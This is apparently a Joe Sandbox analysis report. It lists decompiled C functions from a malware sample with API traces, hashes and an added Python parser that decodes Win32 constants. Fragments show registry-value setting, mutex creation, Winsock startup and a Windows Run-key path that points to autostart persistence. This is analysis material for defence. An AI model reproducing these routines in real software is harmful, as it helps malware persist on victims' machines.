                                                                    • Opcode Fuzzy Hash: 80d5f51eb2a601793c758b4e9606f64216645548f2d35760f499f7caaafa7086
                                                                    • Instruction Fuzzy Hash: A4E01275A4031876DAB0A556AC0DF877A6DDBC4711F0405B1BA58E62C1ED60DD498AA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E02D20F6E(void** __ecx, short** _a8) {
                                                                    				int _v8;
                                                                    				signed int _t8;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_v8 = 0;
                                                                    				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed; hKey = HKEY_CURRENT_USER, dwOptions 1 = REG_OPTION_NON_VOLATILE, samDesired 1 = KEY_QUERY_VALUE, _v8 receives lpdwDisposition
                                                                    				if(_t8 != 0) {
                                                                    					return 0;
                                                                    				}
                                                                    				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1; // _t8 is 0 here: 2 if the key was just created (REG_CREATED_NEW_KEY == 1), 1 if it already existed
                                                                    			}

                                                                    0x02d20f71
                                                                    0x02d20f86
                                                                    0x02d20f8e
                                                                    0x02d20f97
                                                                    0x00000000
                                                                    0x02d20fa3
                                                                    0x00000000

                                                                    APIs
                                                                    • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,745D0770,?,?,02D21165,?,?), ref: 02D20F8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: a2fe33215ae86da3e5f6f9a8aac277b01fb6c83848356b4541e8423df7dc71cb
                                                                    • Instruction ID: 7001d316812dd7b37392bde13b3774a1013383a5f25663e9abe60a292a48f38d
                                                                    • Opcode Fuzzy Hash: a2fe33215ae86da3e5f6f9a8aac277b01fb6c83848356b4541e8423df7dc71cb
                                                                    • Instruction Fuzzy Hash: 7AE0DF32515229FFDB30CA528E08FCB3F6CDF95BE8F008054F50AA2280C2B18A04D6F0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
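The trace lines under each listing ("Name.MODULE(args), ref: ADDR") carry the argument values the sandbox resolved at call time, and the constants in them (0x80000001 for RegCreateKeyExW, 0xFDE9 for MultiByteToWideChar, 0x3000/0x4 for VirtualAlloc, the Run-key string on the stack at the GetModuleFileNameW call) are what tell an analyst what the decompiled functions above are for. The parser below is an added example, not part of the Joe Sandbox report or of the sample's code: it decodes those lines over constructed input copied from the listings above. The autostart marker list and the note wording are this example's own assumptions.

```python
# Added example, not code from the Joe Sandbox report or from the sample:
# parse the report's API-trace lines, decode the Win32 constants the
# decompiled functions pass, and flag autostart strings on the caller's stack.
import re
from dataclasses import dataclass, field
from typing import List, Optional, Union

Arg = Union[int, str, None]

# The paren group is optional so entries like "_free.LIBCMT ref: 00411007" parse too.
_TRACE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
          0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
_CODEPAGES = {0: "CP_ACP", 1: "CP_OEMCP", 0xFDE9: "CP_UTF8"}
_ALLOC = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
_PROT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
# Stack strings that point at autostart persistence (assumed marker list).
_AUTOSTART_MARKERS = (r"\CurrentVersion\Run", r"\Startup")


@dataclass
class TraceCall:
    name: str
    module: str
    args: List[Arg]
    ref: int
    notes: List[str] = field(default_factory=list)


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok in ("", "?"):
        return None                        # value the sandbox could not resolve
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok):
        return int(tok, 16) & 0xFFFFFFFF   # "-00000001" -> 0xFFFFFFFF
    return tok                             # string the sandbox read from memory


def _fmt(v: Arg) -> str:
    return "?" if v is None else (f"0x{v:x}" if isinstance(v, int) else repr(v))


def _flags(value: int, table: dict) -> str:
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)             # bits not covered by the table
    if rest:
        names.append(f"0x{rest:x}")
    return "|".join(names) or "0"


def _annotate(call: TraceCall) -> None:
    a = call.args
    ints = [x if isinstance(x, int) else None for x in a]
    if call.name == "RegCreateKeyExW" and len(a) >= 6:
        call.notes.append(f"hive={_HIVES.get(ints[0], _fmt(a[0]))}")
        call.notes.append("options=REG_OPTION_NON_VOLATILE" if ints[4] == 1 else f"options={_fmt(a[4])}")
        call.notes.append("sam=KEY_QUERY_VALUE" if ints[5] == 1 else f"sam={_fmt(a[5])}")
    elif call.name == "MultiByteToWideChar" and len(a) >= 4:
        call.notes.append(f"codepage={_CODEPAGES.get(ints[0], _fmt(a[0]))}")
        call.notes.append("cbMultiByte=-1 (NUL-terminated)" if ints[3] == 0xFFFFFFFF else f"cbMultiByte={_fmt(a[3])}")
    elif call.name == "VirtualAlloc" and len(a) >= 4 and ints[2] is not None and ints[3] is not None:
        call.notes.append(f"type={_flags(ints[2], _ALLOC)}")
        call.notes.append(f"protect={_PROT.get(ints[3], _fmt(a[3]))}")
    elif call.name == "GetModuleFileNameW" and len(a) >= 3:
        call.notes.append("hModule=0 (path of the running image)" if ints[0] == 0 else f"hModule={_fmt(a[0])}")
        call.notes.append(f"nSize={_fmt(a[2])}")
    for s in (x for x in a if isinstance(x, str)):
        if any(m.lower() in s.lower() for m in _AUTOSTART_MARKERS):
            call.notes.append(f"autostart key on caller stack: {s}")


def parse_trace_line(line: str) -> Optional[TraceCall]:
    m = _TRACE_RE.match(line)
    if m is None:
        return None
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw is not None else []
    call = TraceCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))
    _annotate(call)
    return call


def triage(lines) -> List[str]:
    """One 'Name@REF: notes' string per trace entry; non-trace lines are skipped."""
    out = []
    for ln in lines:
        c = parse_trace_line(ln)
        if c is not None:
            out.append(f"{c.name}@{c.ref:08X}: " + ("; ".join(c.notes) or "-"))
    return out


# Constructed sample: trace lines copied from the function listings in this report.
SAMPLE = [
    r"• RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,745D0770,?,?,02D21165,?,?), ref: 02D20F8E",
    r"• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770,?,02D1350E,00000000), ref: 02D130F5",
    r"  • Part of subcall function 02D15E22: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,02D133E2,?,02D15A4F,.bss,00000000), ref: 02D15E30",
    r"• GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,02D235AB,?,02D21618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 02D1F4A2",
    r"• _free.LIBCMT ref: 00411007",
    "Memory Dump Source",
]

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE)))
```

The decoder deliberately reports values as the sandbox recorded them rather than as the decompiler shows them: the MultiByteToWideChar trace above records cbMultiByte as 0xFF while the listing passes 0xffffffff, and a disagreement of that kind is worth noticing before trusting either view.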

                                                                    C-Code - Quality: 100%
                                                                    			E02D131D4(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
                                                                    				short _v1028;
                                                                    				WCHAR** _t14;
                                                                    				WCHAR** _t15;
                                                                    
                                                                    				_t15 = __edx;
                                                                    				_t14 = __ecx;
                                                                    				E02D11052( &_v1028, 0, 0x400);
                                                                    				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff); // nSize 0x1ff WCHARs into a 0x400-byte (0x200 WCHAR) stack buffer
                                                                    				E02D135E5(_t14,  &_v1028); // executed
                                                                    				return _t14;
                                                                    			}

                                                                    0x02d131ed
                                                                    0x02d131ef
                                                                    0x02d131f1
                                                                    0x02d13207
                                                                    0x02d13216
                                                                    0x02d13220

                                                                    APIs
                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 02D13207
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                                                    • String ID:
                                                                    • API String ID: 1709970682-0
                                                                    • Opcode ID: cb4c67136f1c8355af3aa44115590a999d2c313d95f8aaf881fe09b8d2a8d915
                                                                    • Instruction ID: 4cb20e2c0dade92fa7970569359adacd6ad566025935a49133fd5d18db1658c5
                                                                    • Opcode Fuzzy Hash: cb4c67136f1c8355af3aa44115590a999d2c313d95f8aaf881fe09b8d2a8d915
                                                                    • Instruction Fuzzy Hash: 8DE048B6B4011977DB30A615AC05F9677ADDFC4718F1404B5BB08F22C0E975DD0ACBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
E02D13335(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
    void* _t4;
    WCHAR* _t6;
    WCHAR** _t8;
    WCHAR** _t14;

    _t14 = _a4;
    _t8 = __ecx;
    _t4 = E02D13261(_t14);
    _t6 = E02D15E46( *((intOrPtr*)(__ecx)), 4 + (_t4 + E02D13261(__ecx)) * 2); // executed
    *_t8 = _t6;
    return lstrcatW(_t6, *_t14);
}

APIs
  • Part of subcall function 02D13261: lstrlenW.KERNEL32(745D0770,02D13646,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D13268
• lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Similarity
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
• Opcode ID: 43efe19326316533e761432fde4d44b3b9075abe5b044def351b6dd0d6407c39
• Instruction ID: 95c0235b1adcc178bef66b04adf47cfc3c6b31f4e163dbf9404519b9c9f252a1
• Opcode Fuzzy Hash: 43efe19326316533e761432fde4d44b3b9075abe5b044def351b6dd0d6407c39
• Instruction Fuzzy Hash: DAE0DF72600210ABCB046BA9F8C486EBB9EEFD5360F044436EE05D7300EA306C208EE0
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E02D21039(void** __ecx, short** _a4, char** _a8, int _a12) {
    long _t8;
    void* _t13;

    _t13 = *__ecx;
    if(_t13 == 0) {
        L3:
        return 0;
    }
    _t8 = RegSetValueExW(_t13, *_a4, 0, _a12, *_a8, _a8[1]); // executed
    if(_t8 != 0) {
        goto L3;
    }
    return _t8 + 1;
}

APIs
• RegSetValueExW.KERNEL32(?,745D0770,00000000,?,?,?,?,?,02D21432,00000000,00000000,?,00000001,?,?,?), ref: 02D21058
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 07f899f137bbaef725b6d810f81f036aef6f547035d9f23e32c5271f936b2fad
• Instruction ID: 3df984d82247d7163dd5768a3db73140c202faac8def5b041f7ebabe76bed17f
• Opcode Fuzzy Hash: 07f899f137bbaef725b6d810f81f036aef6f547035d9f23e32c5271f936b2fad
• Instruction Fuzzy Hash: F2E01A322011A4AFDB108F54C945EAB77A8EB59B54F258059FE099B311D731EC14DBA4
Uniqueness Score: -1.00%

C-Code - Quality: 58%
E02D158D3(void* __ecx, void* __eflags) {

    E02D131C3(__ecx);
    *((intOrPtr*)(__ecx + 0x10)) = 0;
    *((intOrPtr*)(__ecx + 0x14)) = 0;
    *((intOrPtr*)(__ecx + 0x30)) = 0;
    *((intOrPtr*)(__ecx + 0x34)) = 0;
    E02D20298(__ecx + 0x1d8, __ecx);
    __imp__#115(2, __ecx + 0x38); // executed; WS2_32 ordinal #115 = WSAStartup (see APIs below)
    *(__ecx + 0xc) = *(__ecx + 0xc) | 0xffffffff;
    *((intOrPtr*)(__ecx + 0x18)) = 0;
    *((intOrPtr*)(__ecx + 0x24)) = 0;
    return __ecx;
}

APIs
  • Part of subcall function 02D20298: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,02D1FEDE,?,?,02D20459,?,745D0770,00000000,02D15A34), ref: 02D202A0
• WSAStartup.WS2_32(00000002,?), ref: 02D158FC
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Similarity
• API ID: CreateMutexStartup
• String ID:
• API String ID: 3730780901-0
• Opcode ID: 7294fe3acef5c8d7f952344964301ba7046ec7e9ade3436c4920bc25b7aa412b
• Instruction ID: f66a046362cea349755752b4e344cf677dfcf15e5795098a1d5c9954a7b6aafe
• Opcode Fuzzy Hash: 7294fe3acef5c8d7f952344964301ba7046ec7e9ade3436c4920bc25b7aa412b
• Instruction Fuzzy Hash: F9E0C071501B109BC2709F1AA544857FBE8FFA07207001B1F949782A50C770A5498F60
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E02D1FDA5(intOrPtr* __ecx, intOrPtr _a4) {
    intOrPtr* _t10;

    _t10 = __ecx;
    E02D13125(__ecx + 4, _a4); // executed
    *_t10 = CreateEventA(0, 1, 0, *(_t10 + 4));
    return 1;
}

APIs
  • Part of subcall function 02D13125: lstrcatA.KERNEL32(00000000,745D0770,?,00000000,?,02D135C4,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D13151
• CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 02D1FDC0
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Similarity
• API ID: CreateEventlstrcat
• String ID:
• API String ID: 2275612694-0
• Opcode ID: 583ba9e5ff1c630d7519a247e93a878dc97aa2774164c12a8283615a17a1f46e
• Instruction ID: 233f309d94d1901e8dfc9d07eb87573a8a010c3685eac4e206a7eae8e6b23cdd
• Opcode Fuzzy Hash: 583ba9e5ff1c630d7519a247e93a878dc97aa2774164c12a8283615a17a1f46e
• Instruction Fuzzy Hash: 36D0A733244205BBD711EF91EC06F86FF6AFB65770F104026F65996680DBB1A434CBA0
Uniqueness Score: -1.00%

C-Code - Quality: 100%
_entry_(char _a8) {

    _t1 = &_a8;
    *_t1 = _a8 - 1;
    if( *_t1 == 0) {
        CreateThread(0, 0, E02D15CE2, 0, 0, 0); // executed
    }
    return 1;
}

Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 35ca33b41ad3502360cd4b25911e7f0f3d1f10f9bcc2a10708bd7cd514091f91
• Instruction ID: 2aefb0253a1ce7eacd0723de19779b2d89d8b0f10babf8d8b6e323968990e4e2
• Opcode Fuzzy Hash: 35ca33b41ad3502360cd4b25911e7f0f3d1f10f9bcc2a10708bd7cd514091f91
• Instruction Fuzzy Hash: 01C08CB19D02187F76005EB13E0CE37338CEB242187908860BC12C1600D928CC688AB1
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E02D20298(void** __ecx) {
    void* _t5;
    void** _t10;

    _t10 = __ecx;
    _t5 = CreateMutexA(0, 0, 0); // executed
    *_t10 = _t5;
    _t10[1] = 0 | _t5 != 0xffffffff;
    return _t10;
}

APIs
• CreateMutexA.KERNEL32(00000000,00000000,00000000,?,02D1FEDE,?,?,02D20459,?,745D0770,00000000,02D15A34), ref: 02D202A0
Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
Similarity
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
• Opcode ID: dd2afd6d30d018410b6e0feee4d3272176d0e44d0dc84bb4931143d53a87e0f5
• Instruction ID: 3772000fd42243eae0a8e7b5262370a2eb16e098ba7f8fd6b03ff792a2718426
• Opcode Fuzzy Hash: dd2afd6d30d018410b6e0feee4d3272176d0e44d0dc84bb4931143d53a87e0f5
• Instruction Fuzzy Hash: E8D012B19005205FA3249F395C4886776DDEF98720316CE29B4A5CB2C4E6308C508770
Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E02D15558(void** __ecx, void* __eflags) {
                                                                    				int _t7;
                                                                    				void* _t12;
                                                                    				void* _t13;
                                                                    
                                                                    				__imp__#116(_t13); // executed
                                                                    				E02D20283( &(__ecx[0x76]));
                                                                    				E02D13036( &(__ecx[0xc]));
                                                                    				E02D13036( &(__ecx[4]));
                                                                    				_t12 =  *__ecx;
                                                                    				_t7 = VirtualFree(_t12, 0, 0x8000); // executed
                                                                    				return _t7;
                                                                    			}






                                                                    0x02d1555b
                                                                    0x02d15567
                                                                    0x02d1556f
                                                                    0x02d15577
                                                                    0x02d1557c
                                                                    0x02d15ead
                                                                    0x02d15eb3

                                                                    APIs
                                                                    • WSACleanup.WS2_32 ref: 02D1555B
                                                                      • Part of subcall function 02D20283: ReleaseMutex.KERNEL32(?,?,02D1FEFD,02D2359A,02D15BEC,02D2359A,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 02D20288
                                                                      • Part of subcall function 02D20283: FindCloseChangeNotification.KERNEL32(?), ref: 02D20290
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ChangeCleanupCloseFindMutexNotificationRelease
                                                                    • String ID:
                                                                    • API String ID: 1413882471-0
                                                                    • Opcode ID: b1ad43a2bd08640039e9b8382db46a82f193e549f1d8cea0300631f54ba6e6d8
                                                                    • Instruction ID: 9e3241766e871e3883bdf1da3f7b392ee9993005d053b13e6512ec6dbba1921f
                                                                    • Opcode Fuzzy Hash: b1ad43a2bd08640039e9b8382db46a82f193e549f1d8cea0300631f54ba6e6d8
                                                                    • Instruction Fuzzy Hash: 79D092308546559BC2B8EF30E9A08E9B3A2FF64350B90096E849313A90AF61AD09CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D20FAE(void** __ecx) {
                                                                    				long _t1;
                                                                    				signed int* _t3;
                                                                    
                                                                    				_t3 = __ecx;
                                                                    				if( *__ecx != 0) {
                                                                    					_t1 = RegCloseKey( *__ecx); // executed
                                                                    				}
                                                                    				 *_t3 =  *_t3 & 0x00000000;
                                                                    				return _t1;
                                                                    			}





                                                                    Instruction addresses: 0x02d20faf 0x02d20fb4 0x02d20fb8 0x02d20fb8 0x02d20fbe 0x02d20fc2

                                                                    APIs
                                                                    • RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 9d09a09d2c9fb8192b9f184ff15d098c3dc848cb14233f85542f95e8cd6b5a64
                                                                    • Instruction ID: 9c7f224c0bdb615cc4fdb7af00fc14e9b180bcd05ac289411e193af83408cc16
                                                                    • Opcode Fuzzy Hash: 9d09a09d2c9fb8192b9f184ff15d098c3dc848cb14233f85542f95e8cd6b5a64
                                                                    • Instruction Fuzzy Hash: 9DC04C31454221CBD7351F14F504790B7E5AB14316F25085DD4C055194A7B50CD4CE44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,02D211A6,00000000,?,?,?,?,00000000,745D0770,00000000), ref: 02D1F725
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateDirectory
                                                                    • String ID:
                                                                    • API String ID: 4241100979-0
                                                                    • Opcode ID: 68e2826450fd4e55ccafb2be46ed01717b62dcb1e81e31cfae363539f7efb339
                                                                    • Instruction ID: 34dc582b230ecbfedd994e2500228f96741cc75ea60eeec0f77960ce78e0189b
                                                                    • Opcode Fuzzy Hash: 68e2826450fd4e55ccafb2be46ed01717b62dcb1e81e31cfae363539f7efb339
                                                                    • Instruction Fuzzy Hash: BEB012307E830157DA101A708C06F1036119B52F07F200560B156C80D4C65100145504
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E02D20969(void* __ecx, CHAR* __edx, void* __eflags) {
                                                                    				CHAR* _v8;
                                                                    				char _v12;
                                                                    				void* _t20;
                                                                    				intOrPtr _t22;
                                                                    				int _t25;
                                                                    				void* _t31;
                                                                    				void* _t38;
                                                                    				signed int _t41;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_v8 = __edx;
                                                                    				_t41 = 0;
                                                                    				_t31 = __ecx;
                                                                    				_t38 = E02D2064E(__ecx, __eflags, 0,  &_v12);
                                                                    				if(_t38 == 0) {
                                                                    					L4:
                                                                    					_t20 = 0;
                                                                    				} else {
                                                                    					_t22 =  *((intOrPtr*)(_t38 + 0x20)) + __ecx;
                                                                    					_v12 = _t22;
                                                                    					if( *((intOrPtr*)(_t38 + 0x18)) <= 0) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						while(1) {
                                                                    							_t25 = lstrcmpA( *((intOrPtr*)(_t22 + _t41 * 4)) + _t31, _v8); // executed
                                                                    							if(_t25 == 0) {
                                                                    								break;
                                                                    							}
